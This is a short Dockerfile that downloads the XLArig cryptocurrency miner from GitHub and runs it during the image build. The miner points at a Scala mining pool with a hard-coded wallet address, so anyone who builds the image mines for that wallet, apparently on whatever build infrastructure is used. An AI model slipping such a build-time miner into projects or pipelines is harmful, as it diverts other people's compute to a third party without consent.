FROM ubuntu:latest
RUN apt-get update -y && \
    apt-get install wget unzip cgroup-tools -y && \
    wget https://github.com/scala-network/XLArig/releases/download/v5.2.2/XLArig-v5.2.2-linux-x86_64.zip && \
    unzip XLArig-v5.2.2-linux-x86_64.zip && \
    ./xlarig -o scala.herominers.com:10131 -u SvmbwrqJanGEWgYzmgLYeFKqZWtRZSXTYa11vvFQxUeWhsUGbUJQGEyY6yfnS9nAwNPwMyghTLJ8qFV9yWxoSn2K2PKov34aG -p docker -a panthera -k
